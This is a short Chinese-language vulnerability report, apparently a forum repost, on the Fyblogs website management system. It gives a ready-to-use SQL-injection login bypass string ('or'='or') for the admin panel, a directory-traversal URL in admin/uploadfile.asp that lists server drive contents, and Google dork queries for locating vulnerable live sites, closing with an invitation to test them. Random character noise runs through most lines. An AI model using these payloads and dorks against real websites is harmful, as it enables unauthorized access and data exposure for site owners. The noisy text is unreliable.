漏洞类型: 未授权访问/权限绕过
1 D1 J* w7 C1 l$ q; g7 \; }. s: q" D9 p, I: L- o
简要描述: @( `& F6 {2 y
5 G4 T% ~- ^" M* U& [/ s" l. [' m- |
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
0 Y$ n5 P- [: l
5 H3 u- X5 Z2 V8 }详细说明:3 u7 ^+ H" v4 C z7 {
) O0 u4 p% O t$ r后台万能密码 'or'='or'
+ L7 @# p: D% b后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!# p, u4 i) C# J1 ~) |3 b
admin/uploadfile.asp?currentFolder=/upfiles/../
2 S0 `) [7 |! K4 e! G7 v: [& U \) z" _) @1 q4 u
漏洞证明:# O1 L" X& c& V3 |7 k9 G- Y
1 [3 Z6 x; u1 S; T1 E谷歌:inurl:type.asp?id=1 新闻中心! \2 f `8 t- N- b- R4 b2 k
或者 :inurl:download_ok.asp?. u j# p m( v# B+ ~6 K
" \8 n7 B' ]/ f; A+ u' q
可以测试6 f* B5 N5 u3 O1 ^+ I2 w
8 C$ P a) H% o j9 R5 v, p' d
5 T+ }( @$ V( L' i& A: K+ d f+ W0 } D |